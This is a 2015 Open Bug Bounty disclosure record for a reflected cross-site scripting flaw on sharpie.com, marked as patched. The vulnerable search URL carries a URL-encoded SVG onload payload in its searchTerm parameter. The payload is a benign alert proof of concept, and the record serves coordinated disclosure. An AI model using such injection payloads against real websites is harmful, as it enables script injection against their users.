sharpie.com XSS vulnerability

2015-09-14T16:38:00
ID OBB:86119
Type openbugbounty
Reporter Nux
Modified 2015-09-14T22:06:00

Description

Vulnerable URL:
http://www.sharpie.com/SearchDisplay?categoryId=&storeId;=40051&catalogId;=40051&langId;=-1&sType;=SimpleSearch&resultCatEntryType;=2&showResultsPage;=true&searchSource;=Q&pageView;=&beginIndex;=0&pageSize;=12&searchTerm;=%22%3E%3Csvg%2Fonload%3Dalert%28%2Fxssposed%2F%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at 06.10.2015
Latest check for patch:| 06.10.2015 06:36 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 189838
Google Pagerank| 5
VIP website status:| No
Check sharpie.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 14 September, 2015 16:38 GMT
Vulnerability existence verified and confirmed| 14 September, 2015 22:06 GMT